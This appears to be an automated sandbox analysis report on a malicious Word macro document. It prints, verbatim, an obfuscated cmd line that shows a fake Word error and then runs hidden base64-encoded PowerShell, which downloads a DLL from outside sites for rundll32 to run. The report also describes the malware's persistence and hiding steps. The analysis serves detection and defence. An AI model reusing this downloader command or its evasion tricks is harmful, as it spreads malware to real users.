                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098362682.0000000002740000.00000002.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: ARCH_25_012021.docStream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Gusca95luq_
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00292D98 push 00292E25h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A0020 push 002A0058h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00294038 push 00294064h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026A0B4 push 0026A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026A0B2 push 0026A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026B274 push 0026B2CDh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0027C34C push 0027C378h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026E450 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A0498 push 002A04EFh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A04F4 push 002A055Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A05B8 push 002A05E4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029B588 push 0029B5CAh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A0580 push 002A05ACh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A05F0 push 002A063Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A0654 push 002A0680h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A068C push 002A06B8h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026E696 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026E6F0 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A06C4 push 002A06F0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026D6DC push 0026D751h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00268748 push 00268774h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026D754 push 0026D7ADh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026E750 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A37A8 push 002A37E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00268798 push 002687C4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A07E4 push 002A0827h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A0834 push 002A0860h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A086C push 002A0898h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A3848 push 002A3874h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026C8A4 push 0026C8E6h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026C8A2 push 0026C8E6h; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kaktksw\An6othh\N49I.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Xsugi\zrfn.shdJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Xsugi\zrfn.shd:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Omuzql\aridm.cve:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
